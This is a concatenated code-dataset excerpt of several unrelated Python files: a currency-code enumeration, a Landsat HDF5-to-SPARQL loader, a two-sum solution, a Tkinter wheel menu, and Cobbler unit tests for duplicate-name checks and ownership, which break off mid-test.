CurrencyCode.TJS = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='TJS', tag='TJS')
CurrencyCode.TMM = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='TMM', tag='TMM')
CurrencyCode.TND = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='TND', tag='TND')
CurrencyCode.TOP = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='TOP', tag='TOP')
CurrencyCode.TPE = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='TPE', tag='TPE')
CurrencyCode.TRL = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='TRL', tag='TRL')
CurrencyCode.TTD = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='TTD', tag='TTD')
CurrencyCode.TWD = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='TWD', tag='TWD')
CurrencyCode.TZS = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='TZS', tag='TZS')
CurrencyCode.UAH = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='UAH', tag='UAH')
CurrencyCode.UGX = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='UGX', tag='UGX')
CurrencyCode.USD = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='USD', tag='USD')
CurrencyCode.UYU = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='UYU', tag='UYU')
CurrencyCode.UZS = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='UZS', tag='UZS')
CurrencyCode.VEB = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='VEB', tag='VEB')
CurrencyCode.VND = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='VND', tag='VND')
CurrencyCode.VUV = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='VUV', tag='VUV')
CurrencyCode.WST = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='WST', tag='WST')
CurrencyCode.XAF = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='XAF', tag='XAF')
CurrencyCode.XCD = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='XCD', tag='XCD')
CurrencyCode.XOF = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='XOF', tag='XOF')
CurrencyCode.XPF = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='XPF', tag='XPF')
CurrencyCode.YER = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='YER', tag='YER')
CurrencyCode.YUM = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='YUM', tag='YUM')
CurrencyCode.ZAR = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='ZAR', tag='ZAR')
CurrencyCode.ZMK = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='ZMK', tag='ZMK')
CurrencyCode.ZWD = CurrencyCode._CF_enumeration.addEnumeration(unicode_value='ZWD', tag='ZWD')
CurrencyCode._InitializeFacetMap(CurrencyCode._CF_enumeration)
Namespace.addCategoryObject('typeBinding', 'CurrencyCode', CurrencyCode)
| Trax-air/ddexreader | ddexreader/ern312/_iso4217a.py | Python | mit | 20,742 |
#!/usr/bin/env python3
"""Loads an HDF5 file representing Landsat data into a triple store via
SPARQL."""
from argparse import ArgumentParser
from base64 import b64encode
from io import StringIO, BytesIO
from itertools import islice, chain
from dateutil.parser import parse as date_parse
import h5py
import numpy as np
from scipy.misc import toimage
from screw_rdflib import (ConjunctiveGraph, Literal, Namespace, OWL, RDF, RDFS,
XSD, URIRef, BNode, Graph)
# RDF namespaces
GEO = Namespace('http://www.w3.org/2003/01/geo/wgs84_pos#')
LED = Namespace('http://www.example.org/ANU-LED#')
QB = Namespace('http://purl.org/linked-data/cube#')
SDMXC = Namespace('http://purl.org/linked-data/sdmx/2009/concept#')
SDMXD = Namespace('http://purl.org/linked-data/sdmx/2009/dimension#')
SDMXM = Namespace('http://purl.org/linked-data/sdmx/2009/measure#')
OGC = Namespace('http://www.opengis.net/ont/geosparql#')
# Default graph to update (doesn't really matter because default graph on query
# is union of all named graphs)
DEFAULT = LED.lsGraph
# Boilerplate turtles are the best turtles
BOILERPLATE_TURTLE = """
@prefix : <{LED}> .
@prefix rdf: <{RDF}> .
@prefix rdfs: <{RDFS}> .
@prefix xsd: <{XSD}> .
@prefix qb: <{QB}> .
@prefix sdmx-concept: <{SDMXC}> .
@prefix sdmx-dimension: <{SDMXD}> .
@prefix sdmx-measure: <{SDMXM}> .
@prefix geo: <{GEO}> .
@prefix owl: <{OWL}> .
@prefix ogc: <{OGC}> .
@prefix gcmd-platform: <http://geobrain.laits.gmu.edu/ontology/2004/11/gcmd-platform.owl#> .
@prefix gcmd-instrument: <http://geobrain.laits.gmu.edu/ontology/2004/11/gcmd-instrument.owl#> .
:landsatDSD a qb:DataStructureDefinition ;
qb:component :instrumentComponent
, :positionComponent
, :satelliteComponent
, :timeComponent
, :dataComponent
, :etmBandComponent
, :dggsComponent
, :dggsCellComponent
, :dggsLevelSquareComponent
, :dggsLevelPixelComponent .
:landsatDS a qb:DataSet ;
rdfs:label "Landsat sensor data"@en ;
rdfs:comment "Some data from LandSat, retrieved from AGDC"@en ;
qb:structure :landsatDSD ;
:instrument gcmd-instrument:SCANNER ;
:satellite gcmd-platform:LANDSAT-7 ;
:dggs "rHEALPix WGS84 Ellipsoid" .
:instrumentComponent a qb:ComponentSpecification ;
qb:attribute :instrument .
:positionComponent a qb:ComponentSpecification ;
qb:dimension :location .
:satelliteComponent a qb:ComponentSpecification ;
qb:attribute :satellite .
:timeComponent a qb:ComponentSpecification ;
qb:dimension :time .
:dataComponent a qb:ComponentSpecification ;
qb:measure :imageData .
:etmBandComponnet a qb:ComponentSpecification ;
qb:dimension :etmBand .
:dggsComponent a qb:ComponentSpecification ;
qb:attribute :dggs .
:dggsCellComponent a qb:ComponentSpecification ;
qb:dimension :dggsCell .
:dggsLevelSquareComponent a qb:ComponentSpecification ;
qb:dimension :dggsLevelSquare .
:dggsLevelPixelComponent a qb:ComponentSpecification ;
qb:dimension :dggsLevelPixel .
:etmBand a qb:AttributeProperty ;
rdfs:label "LandSat ETM observation band"@en;
rdfs:range xsd:integer .
:instrument a qb:AttributeProperty ;
rdfs:range gcmd-instrument:Instrument .
:satellite a qb:AttributeProperty ;
rdfs:range gcmd-platform:PLATFORM .
:time a qb:AttributeProperty ;
rdfs:range xsd:dateTime .
:dggs a qb:AttributeProperty ;
rdfs:range xsd:string .
:dggsCell a owl:DatatypeProperty, qb:DimensionProperty ;
rdfs:range xsd:string .
:dggsLevelSquare a qb:DimensionProperty ;
rdfs:range xsd:integer .
:dggsLevelPixel a qb:DimensionProperty ;
rdfs:range xsd:integer .
""".format(QB=QB, SDMXD=SDMXD, SDMXM=SDMXM, LED=LED, GEO=GEO, SDMXC=SDMXC,
RDF=RDF, RDFS=RDFS, XSD=XSD, OWL=OWL, OGC=OGC)
def slow(generator, suffix, interval=500, total=None):
    """Wrap a slow iterable, passing its items through unchanged while
    printing a progress line (``<count></total> <suffix>``) every
    ``interval`` items. ``total`` is optional and purely cosmetic."""
    total_suffix = '' if total is None else '/' + str(total)
    count = 0
    for value in generator:
        if count % interval == 0:
            print('{}{} {}'.format(count, total_suffix, suffix))
        count += 1
        yield value
def array_to_png(array):
    """Render a 2D masked array as a base64 ``data:image/png;base64,...``
    URI. Masked entries are made transparent via an alpha channel."""
    assert array.ndim == 2
    image = toimage(array)
    mask = array.mask
    if mask.shape:
        # Mask is a full array: add an alpha channel that hides the
        # masked pixels (alpha derived from the inverted mask).
        image.putalpha(toimage(~mask))
    else:
        # Scalar mask: it must be False, i.e. nothing is masked at all.
        assert not mask, 'Need to have some unmasked values'
    buf = BytesIO()
    image.save(buf, format='png')
    encoded = b64encode(buf.getvalue()).decode('utf-8')
    return 'data:image/png;base64,' + encoded
def loc_triples(subj, prop, lat, lon):
    """Yield the triples placing *subj* at (*lat*, *lon*), linked through a
    fresh blank node carrying geo:lat / geo:lon literals."""
    position = BNode()
    for triple in (
            (subj, prop, position),
            (position, GEO.lat, Literal(lat, datatype=XSD.decimal)),
            (position, GEO.lon, Literal(lon, datatype=XSD.decimal))):
        yield triple
def cell_level_square(cell_id):
    """Return the level in the DGGS hierarchy of a slash-separated cell ID,
    counted as the number of non-empty path segments: '/R/0/0/0/0/5' -> 6.
    NOTE(review): the original docstring claimed this example maps to 5,
    but the code has always counted every non-empty segment (including the
    leading 'R'); confirm which level origin downstream consumers expect."""
    return sum(1 for segment in cell_id.split('/') if segment)
def ident_for_tile(cell_id, level_square, level_pixel, band, meta):
    """Build the LED URI that uniquely identifies one observation tile from
    its UTC timestamp, DGGS cell, square/pixel levels and ETM band."""
    utc = meta['datetime'].utctimetuple()
    segments = [
        'observation',
        '{0.tm_year}/{0.tm_mon}/{0.tm_mday}/{0.tm_hour}'
        '/{0.tm_min}/{0.tm_sec}'.format(utc),
        'cell/' + cell_id.strip('/'),
        'levelSquare-%i' % level_square,
        'levelPixel-%i' % level_pixel,
        'band-%i' % band,
    ]
    return LED['/'.join(segments)]
def graph_for_data(cell_id, tile, band, meta):
    """Yield RDF triples describing one band of data for a DGGS cell.

    ``tile`` is either a scalar-ish value (ndim <= 1: a summary pixel)
    or a square 2D array whose side is a power of 3.  ``meta`` supplies
    ``datetime``, ``bounds`` (corner coordinate array) and ``centre``.
    """
    is_pixel = tile.ndim <= 1
    if is_pixel:
        tile_size = 1
    else:
        tile_w, tile_h = tile.shape
        assert tile_w == tile_h
        tile_size = tile_w
    # Find level in DGGS hierarchy of current square and current data
    level_square = cell_level_square(cell_id)
    if is_pixel:
        level_pixel = level_square
    else:
        extra = np.log(tile_size) / np.log(3)
        int_extra = int(round(extra))
        assert abs(extra - int_extra) < 1e-5, \
            'Tile size needs to be power of 3'
        level_pixel = level_square + int_extra
    ident = ident_for_tile(cell_id, level_square, level_pixel, band, meta)
    # Bounding box for the tile, which we'll convert into WKT
    bbox_corners = meta['bounds']
    loc_wkt = Literal('POLYGON(({0}, {1}, {2}, {3}, {0}))'.format(
        *['{} {}'.format(lon, lat) for lon, lat in bbox_corners]
    ), datatype=OGC.wktLiteral)
    # Woooo this resolution calculation makes no sense
    maxes = bbox_corners.max(axis=0)
    mins = bbox_corners.min(axis=0)
    res = np.mean(tile_size / np.abs(maxes - mins))
    if is_pixel:
        yield from [
            (ident, LED.value, Literal(float(tile))),
            (ident, RDF.type, LED.Pixel)
        ]
    else:
        png_tile = URIRef(array_to_png(tile))
        yield from [
            (ident, LED.imageData, png_tile),
            (ident, RDF.type, LED.GridSquare)
        ]
    # Actual data
    yield from [
        (ident, RDF.type, QB.Observation),
        (ident, QB.dataSet, LED.landsatDS),
        (ident, LED.bounds, loc_wkt),
        (ident, LED.etmBand, Literal(band, datatype=XSD.integer)),
        # BUG FIX: the XML Schema datatype is xsd:dateTime (camel case);
        # XSD.datetime produced a datatype URI that does not exist.
        (ident, LED.time, Literal(meta['datetime'], datatype=XSD.dateTime)),
        (ident, LED.resolution,
         Literal(res, datatype=XSD.decimal)),
        (ident, LED.dggsCell, Literal(cell_id)),
        (ident, LED.dggsLevelSquare, Literal(level_square)),
        (ident, LED.dggsLevelPixel, Literal(level_pixel))
    ]
    # Yield the centre point
    centre_lon, centre_lat = meta['centre']
    yield from loc_triples(ident, LED.location, centre_lat, centre_lon)
def convert_meta(src_meta):
    """Convert metadata from the HDF5 file to native Python types.

    Only the ``datetime`` entry needs parsing; every other entry is
    copied through unchanged."""
    return {
        key: date_parse(value) if key == 'datetime' else value
        for key, value in src_meta.items()
    }
def graph_for_cell(cell):
    """Process a single DGGS cell, represented as a h5py group.

    Yields RDF triples for each band: one observation for the cell's
    summary ``pixel`` value and one for the dense ``data`` tile.  The
    group must contain a ``pixel`` dataset (scalar, or 1D with one entry
    per band) and a matching ``data`` dataset (2D, or 3D with the band
    as the leading axis), plus attrs holding the tile metadata
    (``datetime``, ``missing_value``, ...).
    """
    # [()] converts to Numpy array
    pixel = cell['pixel'][()]
    data = cell['data'][()]
    assert pixel.ndim <= 1
    if pixel.ndim == 0:
        # Scalar pixel implies a single band and a plain 2D data tile
        num_bands = 1
        assert data.ndim == 2
    else:
        num_bands = pixel.shape[0]
        assert data.ndim == 3 and data.shape[0] == num_bands, \
            'Pixel and tile need same channel count'
    meta = convert_meta(dict(cell.attrs))
    # The group's HDF5 path doubles as the DGGS cell ID (e.g. /R/0/1)
    cell_id = cell.name
    # Mask out no-data entries so they render as transparent later on
    masked_data = np.ma.masked_values(data, meta['missing_value'])
    for band in range(num_bands):
        if num_bands > 1:
            pixel_band = pixel[band]
            masked_data_band = masked_data[band]
        else:
            pixel_band = pixel
            masked_data_band = masked_data
        # Sanity checks (masked_data_band must be 2D image, pixel must be
        # single number)
        assert np.isscalar(pixel_band) or pixel_band.size == 1
        assert masked_data_band.ndim == 2
        # Both pixel and dense data are treated as "data" (just one has a
        # resolution of 1x1)
        yield from graph_for_data(cell_id, pixel_band, band, meta)
        yield from graph_for_data(cell_id, masked_data_band, band, meta)
def data_cell_ids(hdf5_file):
    """Yield paths (e.g. ``/R/7/8/5/2/1``) of HDF5 groups holding data.

    Depth-first walk over the group tree; a group counts as a data cell
    when it has a ``data`` member (which must come with a ``pixel``
    member)."""
    stack = ['/' + key for key in hdf5_file.keys()]
    while stack:
        path = stack.pop()
        group = hdf5_file[path]
        if 'data' in group:
            assert 'pixel' in group, \
                'HDF5 groups with `data` members need `pixel` members too'
            yield path
        # Queue up this group's sub-groups for exploration too
        stack.extend(path + '/' + key for key in group.keys()
                     if isinstance(group[key], h5py.Group))
def build_graph(hdf5_file):
    """Generator producing all triples for the dataset: the boilerplate
    schema triples first, then one batch of observation triples per
    data-bearing cell."""
    schema_graph = Graph().parse(
        StringIO(BOILERPLATE_TURTLE), format='turtle'
    )
    yield from schema_graph.triples((None, None, None))
    # Just throw the data in the HDF5 file straight into our graph. There's
    # no need to do fancy slicing like we did for GeoTIFF.
    for cell_id in data_cell_ids(hdf5_file):
        print('Processing cell {}'.format(cell_id))
        yield from graph_for_cell(hdf5_file[cell_id])
def iterchunk(iterator, n):
    """Chunk iterator into lazy blocks of size ``n``.

    The final block may be shorter; each yielded block should be
    consumed before advancing to the next one, since all blocks share
    the underlying iterator."""
    source = iter(iterator)
    # Pulling the first element via the for-loop also ends the generator
    # cleanly when the source is exhausted.
    for head in source:
        yield chain([head], islice(source, n - 1))
# Command-line interface. Built at module level; parsing happens only
# under the __main__ guard below.
parser = ArgumentParser()
parser.add_argument(
    'hdf5_file', type=str, help='Path to DGGS-formatted HDF5 file to load'
)
parser.add_argument(
    '--query-url', type=str, default='http://localhost:3030/landsat/query',
    dest='query_url', help='Query URL for SPARQL endpoint'
)
parser.add_argument(
    '--update-url', type=str, default='http://localhost:3030/landsat/update',
    dest='update_url', help='Update URL for SPARQL endpoint'
)
if __name__ == '__main__':
    args = parser.parse_args()
    with h5py.File(args.hdf5_file, 'r') as hdf5_fp:
        graph_triples = build_graph(hdf5_fp)
        # Batch the triples so that Python doesn't asplode
        for triples in slow(iterchunk(graph_triples, 100), 'chunks'):
            # NOTE(review): the SPARQL store is reopened and closed for
            # every 100-triple chunk; presumably this flushes each batch
            # to Fuseki -- confirm before hoisting the open/close out of
            # the loop.
            fuseki = ConjunctiveGraph(store='SPARQLUpdateStore')
            fuseki.open((args.query_url, args.update_url))
            # addN takes quads, so tack the default context onto each triple
            fuseki.addN((s, p, o, DEFAULT) for s, p, o in triples)
            fuseki.close()
    print('Done')
| ANU-Linked-Earth-Data/middleware | batch-demo/import_agdc_data.py | Python | apache-2.0 | 12,109 |
class Solution(object):
    def twoSum(self, nums, target):
        """
        :type nums: List[int]
        :type target: int
        :rtype: List[int]

        Single-pass hash map: for each value, look up the complement
        needed among the values seen so far.  O(n) time / O(n) space,
        replacing the original O(n^2) double loop.  Returns the pair of
        indices, or None when no pair sums to target (as before).
        Assumes at most one valid pair, per the problem statement.
        """
        seen = {}  # value -> first index where it appeared
        for index, value in enumerate(nums):
            complement = target - value
            if complement in seen:
                return [seen[complement], index]
            seen[value] = index
from Tkinter import *
import math
from PIL import ImageTk
from enum import Enum
from lib.SenselGestureFramework.sensel_framework_simple import Direction
# Wheel geometry (pixels): outer diameter, hub scale, and the x/y offset
# of the divider-line endpoints (the circle's 45-degree points).
WHEEL_SIDE = 200.0
SMALL_WHEEL_SIDE = WHEEL_SIDE/5
LINE_L = WHEEL_SIDE*math.sqrt(2)/4
# Colours: wheel background, highlighted quadrant, divider lines
BACK_COLOR = "#97D6FF"
HIGH_COLOR = "#90FF74"
LINE_COLOR = "#FFFFFF"
LINE_WIDTH = 3
class Action(Enum):
    """Tool the user can pick from a wheel-menu quadrant."""
    IMAGE = 0
    SHAPE = 1
    TEXT = 2
def getImages():
    """Load and shrink the icon shown in each wheel quadrant.

    Requires a Tk root window to exist, since PhotoImage needs one."""
    icon_files = {
        Action.IMAGE: "fontawesome/pic.gif",
        Action.SHAPE: "fontawesome/square.gif",
        Action.TEXT: "fontawesome/text.gif",
    }
    return dict((action, PhotoImage(file=path).subsample(12, 12))
                for action, path in icon_files.items())
def convertDirectionToAction(direction):
    """Map a swipe direction to the wheel action on that side.

    Returns None for directions with no associated action (e.g. DOWN)."""
    mapping = {
        Direction.UP: Action.TEXT,
        Direction.LEFT: Action.IMAGE,
        Direction.RIGHT: Action.SHAPE,
    }
    return mapping.get(direction)
class WheelMenu(object):
def __init__ (self, xloc, yloc):
self.xloc = xloc
self.yloc = yloc
self.TR = 0
self.highlight = 0
self.images = getImages()
def changeLoc (self, xloc, yloc):
self.xloc = xloc
self.yloc = yloc
def drawWheel (self, canv):
print LINE_L
self.circ = canv.create_oval(self.xloc - WHEEL_SIDE/2, self.yloc + WHEEL_SIDE/2, self.xloc + WHEEL_SIDE/2, self.yloc - WHEEL_SIDE/2, tags="circle", fill = BACK_COLOR, outline = "")
self.TR = canv.create_line(self.xloc - LINE_L, self.yloc - LINE_L, self.xloc + LINE_L, self.yloc + LINE_L, fill = LINE_COLOR, tags="TRline", width = LINE_WIDTH)
self.TL = canv.create_line(self.xloc + LINE_L, self.yloc - LINE_L, self.xloc - LINE_L, self.yloc + LINE_L, fill = LINE_COLOR, tags="TLline", width = LINE_WIDTH)
self.inner = canv.create_oval(self.xloc - SMALL_WHEEL_SIDE, self.yloc + SMALL_WHEEL_SIDE, self.xloc + SMALL_WHEEL_SIDE, self.yloc - SMALL_WHEEL_SIDE, tags="inner", fill = "white", outline = "")
self.drawImages(canv)
def highlightSide (self, canv, side):
self.circ = canv.create_oval(self.xloc - WHEEL_SIDE/2, self.yloc + WHEEL_SIDE/2, self.xloc + WHEEL_SIDE/2, self.yloc - WHEEL_SIDE/2, tags="circle", fill = BACK_COLOR, outline = "")
self.highlight = canv.create_arc(self.xloc - WHEEL_SIDE/2, self.yloc + WHEEL_SIDE/2, self.xloc + WHEEL_SIDE/2, self.yloc - WHEEL_SIDE/2, tags="circle", fill = HIGH_COLOR, outline = "", start = side-45, extent = 90)
self.TR = canv.create_line(self.xloc - LINE_L, self.yloc - LINE_L, self.xloc + LINE_L, self.yloc + LINE_L, fill = LINE_COLOR, tags="TRline", width = LINE_WIDTH)
self.TL = canv.create_line(self.xloc + LINE_L, self.yloc - LINE_L, self.xloc - LINE_L, self.yloc + LINE_L, fill = LINE_COLOR, tags="TLline", width = LINE_WIDTH)
self.inner = canv.create_oval(self.xloc - SMALL_WHEEL_SIDE, self.yloc + SMALL_WHEEL_SIDE, self.xloc + SMALL_WHEEL_SIDE, self.yloc - SMALL_WHEEL_SIDE, tags="inner", fill = "white", outline = "")
self.drawImages(canv)
def drawImages(self, canvas):
# Draw shapes on each quadrant
canvas.create_image(self.xloc-WHEEL_SIDE/2 + 30, self.yloc, image=self.images[Action.IMAGE])
canvas.create_image(self.xloc+WHEEL_SIDE/2 - 30, self.yloc, image=self.images[Action.SHAPE])
canvas.create_image(self.xloc, self.yloc-WHEEL_SIDE/2 + 30, image=self.images[Action.TEXT])
def clearWheel (self, canv):
if self.TR:
print "ah"
canv.delete(self.TR)
canv.delete(self.TL)
canv.delete(self.circ)
canv.delete(self.inner)
if self.highlight:
canv.delete(self.highlight)
def moveWheel (self, canv, xloc, yloc):
clearWheel(self, canv)
changeLoc(self, self.xloc, self.yloc)
drawWheel(self, canv) | SenselWebDev/SenselWebDeveloper | wheel_menu_framework.py | Python | mit | 3,605 |
# Test cases for Cobbler
#
# Michael DeHaan <mdehaan@redhat.com>
import sys
import unittest
import os
import subprocess
import tempfile
import shutil
import traceback
from cobbler.cexceptions import *
from cobbler import settings
from cobbler import collection_distros
from cobbler import collection_profiles
from cobbler import collection_systems
import cobbler.modules.authz_ownership as authz_module
from cobbler import api
from cobbler import config
from cobbler import utils
# Put cobbler's utility layer into test mode before any tests run
utils.TEST_MODE = True

# Fake kernel/initrd file names; setUp creates empty files with these
# names so distro kernel/initrd path validation has something to find.
FAKE_INITRD="initrd-2.6.15-1.2054_FAKE.img"
FAKE_INITRD2="initrd-2.5.16-2.2055_FAKE.img"
FAKE_INITRD3="initrd-1.8.18-3.9999_FAKE.img"
FAKE_KERNEL="vmlinuz-2.6.15-1.2054_FAKE"
FAKE_KERNEL2="vmlinuz-2.5.16-2.2055_FAKE"
FAKE_KERNEL3="vmlinuz-1.8.18-3.9999_FAKE"
FAKE_KICKSTART="http://127.0.0.1/fake.ks"

# NOTE(review): appears unused in this part of the file -- confirm
# whether anything still appends cleanup directories here.
cleanup_dirs = []
class BootTest(unittest.TestCase):
    """Shared fixture: builds a throwaway cobbler configuration (one
    distro, profile, system and repo) backed by fake files under /tmp
    for each test, and tears the temp tree down afterwards."""

    def setUp(self):
        """Create fake kernel/initrd files and a baseline config."""
        # Create temp dir
        self.topdir = "/tmp/cobbler_test"
        try:
            os.makedirs(self.topdir)
        except OSError:
            # Directory already exists from a previous run -- fine.
            # (Narrowed from a bare `except:` that hid real failures.)
            pass
        self.fk_initrd = os.path.join(self.topdir, FAKE_INITRD)
        self.fk_initrd2 = os.path.join(self.topdir, FAKE_INITRD2)
        self.fk_initrd3 = os.path.join(self.topdir, FAKE_INITRD3)
        self.fk_kernel = os.path.join(self.topdir, FAKE_KERNEL)
        self.fk_kernel2 = os.path.join(self.topdir, FAKE_KERNEL2)
        self.fk_kernel3 = os.path.join(self.topdir, FAKE_KERNEL3)
        self.api = api.BootAPI()
        create = [ self.fk_initrd, self.fk_initrd2, self.fk_initrd3,
                self.fk_kernel, self.fk_kernel2, self.fk_kernel3 ]
        for fn in create:
            # touch each fake kernel/initrd so path validation succeeds
            f = open(fn,"w+")
            f.close()
        self.make_basic_config()

    def tearDown(self):
        """Remove the temp tree and drop the API handle."""
        # only off during refactoring, fix later
        shutil.rmtree(self.topdir,ignore_errors=True)
        self.api = None

    def make_basic_config(self):
        """Add one distro, one profile, one system and one repo."""
        distro = self.api.new_distro()
        self.assertTrue(distro.set_name("testdistro0"))
        self.assertTrue(distro.set_kernel(self.fk_kernel))
        self.assertTrue(distro.set_initrd(self.fk_initrd))
        self.assertTrue(self.api.add_distro(distro))
        self.assertTrue(self.api.find_distro(name="testdistro0"))
        profile = self.api.new_profile()
        self.assertTrue(profile.set_name("testprofile0"))
        self.assertTrue(profile.set_distro("testdistro0"))
        self.assertTrue(profile.set_kickstart(FAKE_KICKSTART))
        self.assertTrue(self.api.add_profile(profile))
        self.assertTrue(self.api.find_profile(name="testprofile0"))
        system = self.api.new_system()
        self.assertTrue(system.set_name("drwily.rdu.redhat.com"))
        self.assertTrue(system.set_mac_address("BB:EE:EE:EE:EE:FF","intf0"))
        self.assertTrue(system.set_ip_address("192.51.51.50","intf0"))
        self.assertTrue(system.set_profile("testprofile0"))
        self.assertTrue(self.api.add_system(system))
        self.assertTrue(self.api.find_system(name="drwily.rdu.redhat.com"))
        repo = self.api.new_repo()
        try:
            os.makedirs("/tmp/test_example_cobbler_repo")
        except OSError:
            # Already present; narrowed from a bare `except:`.
            pass
        fd = open("/tmp/test_example_cobbler_repo/test.file", "w+")
        fd.write("hello!")
        fd.close()
        self.assertTrue(repo.set_name("test_repo"))
        self.assertTrue(repo.set_mirror("/tmp/test_example_cobbler_repo"))
        self.assertTrue(self.api.repos().add(repo))
class DuplicateNamesAndIpPrevention(BootTest):
    """
    The command line (and WebUI) have checks to prevent new system
    additions from conflicting with existing systems and overwriting
    them inadvertantly. This class tests that code. NOTE: General API
    users will /not/ encounter these checks.
    """

    def test_duplicate_prevention(self):
        """Adding an object whose name (or MAC/IP) collides with an
        existing one must raise CobblerException and leave the existing
        object untouched.  The original hand-rolled try/except/
        assertTrue(1==2) pattern is replaced with failUnlessRaises."""
        # find things we are going to test with
        distro1 = self.api.find_distro(name="testdistro0")
        profile1 = self.api.find_profile(name="testprofile0")
        system1 = self.api.find_system(name="drwily.rdu.redhat.com")
        repo1 = self.api.find_repo(name="test_repo")
        # make sure we can't overwrite a previous distro with
        # the equivalent of an "add" (not an edit) on the
        # command line.
        distro2 = self.api.new_distro()
        self.assertTrue(distro2.set_name("testdistro0"))
        self.assertTrue(distro2.set_kernel(self.fk_kernel))
        self.assertTrue(distro2.set_initrd(self.fk_initrd))
        self.assertTrue(distro2.set_owners("canary"))
        # this should fail: duplicate name
        self.failUnlessRaises(CobblerException, self.api.add_distro,
                              distro2, check_for_duplicate_names=True)
        # we caught the exception but make doubly sure there was no write
        distro_check = self.api.find_distro(name="testdistro0")
        self.assertTrue("canary" not in distro_check.owners)
        # repeat the check for profiles
        profile2 = self.api.new_profile()
        self.assertTrue(profile2.set_name("testprofile0"))
        self.assertTrue(profile2.set_distro("testdistro0"))
        self.failUnlessRaises(CobblerException, self.api.add_profile,
                              profile2, check_for_duplicate_names=True)
        # repeat the check for systems (just names this time)
        system2 = self.api.new_system()
        self.assertTrue(system2.set_name("drwily.rdu.redhat.com"))
        self.assertTrue(system2.set_profile("testprofile0"))
        self.failUnlessRaises(CobblerException, self.api.add_system,
                              system2, check_for_duplicate_names=True)
        # repeat the check for repos
        repo2 = self.api.new_repo()
        self.assertTrue(repo2.set_name("test_repo"))
        self.assertTrue(repo2.set_mirror("http://imaginary"))
        self.failUnlessRaises(CobblerException, self.api.add_repo,
                              repo2, check_for_duplicate_names=True)
        # now one more check to verify we can't add a system
        # of a different name but duplicate netinfo.
        system3 = self.api.new_system()
        self.assertTrue(system3.set_name("unused_name"))
        self.assertTrue(system3.set_profile("testprofile0"))
        # MAC is initially accepted
        self.assertTrue(system3.set_mac_address("BB:EE:EE:EE:EE:FF","intf3"))
        # can't add as this MAC already exists!  (BUG FIX: the original
        # try/except quietly passed when no exception was raised at all)
        self.failUnlessRaises(
            CobblerException, self.api.add_system, system3,
            check_for_duplicate_names=True, check_for_duplicate_netinfo=True)
        # set the MAC to a different value and try again; it should work
        self.assertTrue(system3.set_mac_address("FF:EE:EE:EE:EE:DD","intf3"))
        self.assertTrue(self.api.add_system(system3,check_for_duplicate_names=True,check_for_duplicate_netinfo=True))
        # now set the IP so that collides; this should also fail
        self.assertTrue(system3.set_ip_address("192.51.51.50","intf6"))
        self.failUnlessRaises(
            CobblerException, self.api.add_system, system3,
            check_for_duplicate_names=True, check_for_duplicate_netinfo=True)
        # fix the IP and Mac back
        self.assertTrue(system3.set_ip_address("192.86.75.30","intf6"))
        self.assertTrue(system3.set_mac_address("AE:BE:DE:CE:AE:EE","intf3"))
        # now it works again
        # note that we will not check for duplicate names as we want
        # to test this as an 'edit' operation.
        self.assertTrue(self.api.add_system(system3,check_for_duplicate_names=False,check_for_duplicate_netinfo=True))

    # FIXME: note -- how netinfo is handled when doing renames/copies/edits
    # is more involved and we probably should add tests for that also.
class Ownership(BootTest):
    """Exercise per-object ownership and the authz_ownership module."""

    def test_ownership_params(self):
        """Set owners on the fixture objects, write a scratch
        users.conf, and check authorize() grants/denies per the
        ownership rules.  BUG FIX at the end: restore the backed-up
        users.conf in the correct direction."""
        fd = open("/tmp/test_cobbler_kickstart","w+")
        fd.write("")
        fd.close()
        # find things we are going to test with
        distro = self.api.find_distro(name="testdistro0")
        profile = self.api.find_profile(name="testprofile0")
        system = self.api.find_system(name="drwily.rdu.redhat.com")
        repo = self.api.find_repo(name="test_repo")
        # as we didn't specify an owner for objects, the default
        # ownership should be as specified in settings
        default_owner = self.api.settings().default_ownership
        for obj in [ distro, profile, system, repo ]:
            self.assertTrue(obj is not None)
            self.assertEquals(obj.owners, default_owner, "default owner for %s" % obj)
        # verify we can test things
        self.assertTrue(distro.set_owners(["superlab","basement1"]))
        self.assertTrue(profile.set_owners(["superlab","basement1"]))
        self.assertTrue(profile.set_kickstart("/tmp/test_cobbler_kickstart"))
        self.assertTrue(system.set_owners(["superlab","basement1","basement3"]))
        self.assertTrue(repo.set_owners([]))
        self.api.add_distro(distro)
        self.api.add_profile(profile)
        self.api.add_system(system)
        self.api.add_repo(repo)
        # now edit the groups file. We won't test the full XMLRPC
        # auth stack here, but just the module in question
        authorize = authz_module.authorize
        # if the users.conf file exists, back it up for the tests
        if os.path.exists("/etc/cobbler/users.conf"):
            shutil.copyfile("/etc/cobbler/users.conf","/tmp/cobbler_ubak")
        # write a scratch users.conf: one admin plus two groups
        fd = open("/etc/cobbler/users.conf","w+")
        fd.write("\n")
        fd.write("[admins]\n")
        fd.write("admin1 = 1\n")
        fd.write("\n")
        fd.write("[superlab]\n")
        fd.write("superlab1 = 1\n")
        fd.write("superlab2 = 1\n")
        fd.write("\n")
        fd.write("[basement]\n")
        fd.write("basement1 = 1\n")
        fd.write("basement2 = 1\n")
        fd.write("basement3 = 1\n")
        fd.close()
        xo = self.api.find_distro("testdistro0")
        xn = "testdistro0"
        ro = self.api.find_repo("test_repo")
        rn = "test_repo"
        # WARNING: complex test explanation follows!
        # we must ensure those who can edit the kickstart are only those
